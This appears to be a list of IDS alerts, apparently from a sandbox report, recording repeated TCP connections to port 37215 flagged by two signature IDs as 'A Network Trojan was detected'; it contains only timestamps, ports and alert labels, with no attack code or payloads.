                Timestamp:06/14/24-10:44:22.880239
                SID:2829579
                Source Port:45600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473598
                SID:2829579
                Source Port:49566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013693
                SID:2829579
                Source Port:33406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624816
                SID:2829579
                Source Port:53028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807896
                SID:2835222
                Source Port:32942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806698
                SID:2835222
                Source Port:59878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812397
                SID:2835222
                Source Port:50326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967921
                SID:2835222
                Source Port:37150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942761
                SID:2835222
                Source Port:51424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.113988
                SID:2829579
                Source Port:35880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660444
                SID:2835222
                Source Port:48390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.912830
                SID:2835222
                Source Port:59308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614040
                SID:2835222
                Source Port:59090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342616
                SID:2835222
                Source Port:39608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880170
                SID:2835222
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134249
                SID:2829579
                Source Port:58628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775420
                SID:2829579
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717214
                SID:2835222
                Source Port:47034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020770
                SID:2829579
                Source Port:43624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678917
                SID:2835222
                Source Port:56876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789424
                SID:2835222
                Source Port:42422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913558
                SID:2829579
                Source Port:46128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001384
                SID:2835222
                Source Port:40626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014292
                SID:2829579
                Source Port:33006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182631
                SID:2829579
                Source Port:41878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010986
                SID:2835222
                Source Port:49428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184183
                SID:2829579
                Source Port:45656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763089
                SID:2829579
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073783
                SID:2835222
                Source Port:46978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.002049
                SID:2835222
                Source Port:38648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701809
                SID:2829579
                Source Port:47366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545405
                SID:2835222
                Source Port:60444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662967
                SID:2829579
                Source Port:54224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941406
                SID:2835222
                Source Port:50932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225292
                SID:2829579
                Source Port:48050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202482
                SID:2829579
                Source Port:48744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133801
                SID:2835222
                Source Port:51384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966863
                SID:2835222
                Source Port:41648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160887
                SID:2835222
                Source Port:35654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501389
                SID:2835222
                Source Port:54716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762013
                SID:2835222
                Source Port:55928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988117
                SID:2829579
                Source Port:47920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716575
                SID:2829579
                Source Port:42390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565625
                SID:2835222
                Source Port:50754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115019
                SID:2829579
                Source Port:43174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052969
                SID:2835222
                Source Port:33328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688131
                SID:2835222
                Source Port:44296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917040
                SID:2829579
                Source Port:36606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736421
                SID:2835222
                Source Port:38102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661651
                SID:2829579
                Source Port:35038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643769
                SID:2829579
                Source Port:41540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082044
                SID:2829579
                Source Port:58606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683713
                SID:2835222
                Source Port:34826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149403
                SID:2829579
                Source Port:56684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967063
                SID:2835222
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806607
                SID:2835222
                Source Port:51054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985613
                SID:2829579
                Source Port:38674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149745
                SID:2835222
                Source Port:48158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790763
                SID:2829579
                Source Port:51828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133695
                SID:2829579
                Source Port:60158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276446
                SID:2829579
                Source Port:55986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273583
                SID:2835222
                Source Port:36752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013828
                SID:2829579
                Source Port:55552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968387
                SID:2835222
                Source Port:40090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941928
                SID:2829579
                Source Port:48214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934509
                SID:2829579
                Source Port:50272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159290
                SID:2835222
                Source Port:46212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151829
                SID:2835222
                Source Port:33110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668697
                SID:2829579
                Source Port:49370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812011
                SID:2829579
                Source Port:51052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989327
                SID:2835222
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858010
                SID:2829579
                Source Port:56314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704997
                SID:2829579
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185522
                SID:2829579
                Source Port:33378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151068
                SID:2835222
                Source Port:59802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409767
                SID:2835222
                Source Port:43874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143343
                SID:2835222
                Source Port:60934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968301
                SID:2829579
                Source Port:49352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947165
                SID:2829579
                Source Port:48836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678194
                SID:2835222
                Source Port:58330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790147
                SID:2835222
                Source Port:53342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879574
                SID:2829579
                Source Port:34714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202737
                SID:2835222
                Source Port:35988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726031
                SID:2835222
                Source Port:45620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662326
                SID:2835222
                Source Port:33748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112048
                SID:2829579
                Source Port:37164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405826
                SID:2835222
                Source Port:48114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679090
                SID:2835222
                Source Port:35428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766268
                SID:2835222
                Source Port:54614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969732
                SID:2835222
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146967
                SID:2829579
                Source Port:44206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159682
                SID:2835222
                Source Port:46392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760406
                SID:2829579
                Source Port:35128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933624
                SID:2829579
                Source Port:55320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244442
                SID:2835222
                Source Port:49134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230443
                SID:2835222
                Source Port:46572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734221
                SID:2835222
                Source Port:37992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763305
                SID:2835222
                Source Port:34484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135112
                SID:2829579
                Source Port:44698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618753
                SID:2835222
                Source Port:38766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295359
                SID:2835222
                Source Port:55672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684977
                SID:2829579
                Source Port:48862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000161
                SID:2835222
                Source Port:39092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452551
                SID:2829579
                Source Port:46132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724799
                SID:2829579
                Source Port:38440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410831
                SID:2829579
                Source Port:55588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165302
                SID:2829579
                Source Port:55248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056504
                SID:2829579
                Source Port:55980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968150
                SID:2829579
                Source Port:54352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450950
                SID:2835222
                Source Port:50100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021785
                SID:2835222
                Source Port:38900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199757
                SID:2835222
                Source Port:57210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624494
                SID:2835222
                Source Port:37652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991763
                SID:2829579
                Source Port:46502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472670
                SID:2829579
                Source Port:50574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115361
                SID:2829579
                Source Port:60496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146726
                SID:2835222
                Source Port:60948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014389
                SID:2835222
                Source Port:39008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149822
                SID:2835222
                Source Port:49574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727041
                SID:2829579
                Source Port:56750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668476
                SID:2829579
                Source Port:47100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989821
                SID:2835222
                Source Port:54016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453374
                SID:2829579
                Source Port:38212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012430
                SID:2829579
                Source Port:50538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759355
                SID:2835222
                Source Port:32834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717290
                SID:2829579
                Source Port:48576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881666
                SID:2835222
                Source Port:55548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420067
                SID:2829579
                Source Port:38068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762320
                SID:2835222
                Source Port:34022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033416
                SID:2835222
                Source Port:58108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683847
                SID:2835222
                Source Port:38540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031915
                SID:2829579
                Source Port:58360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760871
                SID:2835222
                Source Port:40300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033511
                SID:2829579
                Source Port:33424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277463
                SID:2835222
                Source Port:41652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057484
                SID:2835222
                Source Port:32858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159935
                SID:2829579
                Source Port:42894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944466
                SID:2829579
                Source Port:42234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149844
                SID:2829579
                Source Port:36802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519232
                SID:2829579
                Source Port:57378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932818
                SID:2835222
                Source Port:38408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811669
                SID:2835222
                Source Port:50040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165227
                SID:2829579
                Source Port:33702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074879
                SID:2829579
                Source Port:56010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471862
                SID:2829579
                Source Port:59116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453619
                SID:2835222
                Source Port:50512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792777
                SID:2835222
                Source Port:45454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941642
                SID:2829579
                Source Port:47206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736392
                SID:2835222
                Source Port:49224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718465
                SID:2829579
                Source Port:33860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980180
                SID:2835222
                Source Port:43274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917373
                SID:2835222
                Source Port:55954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861928
                SID:2835222
                Source Port:59002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723783
                SID:2835222
                Source Port:44790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763720
                SID:2835222
                Source Port:44806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727963
                SID:2829579
                Source Port:40228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160415
                SID:2829579
                Source Port:40372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681769
                SID:2829579
                Source Port:57844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177043
                SID:2829579
                Source Port:42714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227238
                SID:2835222
                Source Port:42880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916297
                SID:2835222
                Source Port:54032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017549
                SID:2835222
                Source Port:37774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997354
                SID:2829579
                Source Port:34422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031338
                SID:2829579
                Source Port:48984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230485
                SID:2829579
                Source Port:52478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407944
                SID:2829579
                Source Port:60508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150907
                SID:2829579
                Source Port:36160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052881
                SID:2835222
                Source Port:39564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448898
                SID:2835222
                Source Port:51538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986350
                SID:2835222
                Source Port:51618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013739
                SID:2829579
                Source Port:60914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423436
                SID:2829579
                Source Port:34140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760895
                SID:2835222
                Source Port:41562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737876
                SID:2835222
                Source Port:53692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847400
                SID:2835222
                Source Port:44192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200786
                SID:2829579
                Source Port:47860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677744
                SID:2835222
                Source Port:54664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020073
                SID:2829579
                Source Port:39470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718417
                SID:2829579
                Source Port:60620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732547
                SID:2829579
                Source Port:55106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325791
                SID:2829579
                Source Port:51904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028630
                SID:2829579
                Source Port:45650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762619
                SID:2829579
                Source Port:58688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849860
                SID:2835222
                Source Port:58954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969340
                SID:2829579
                Source Port:46076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160400
                SID:2835222
                Source Port:54840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564691
                SID:2829579
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669991
                SID:2835222
                Source Port:34460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367761
                SID:2829579
                Source Port:37996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145959
                SID:2829579
                Source Port:59136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365186
                SID:2835222
                Source Port:54972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882131
                SID:2835222
                Source Port:60222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148399
                SID:2829579
                Source Port:56352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672146
                SID:2829579
                Source Port:44324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276723
                SID:2835222
                Source Port:52472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367788
                SID:2835222
                Source Port:44700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917467
                SID:2835222
                Source Port:43154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025237
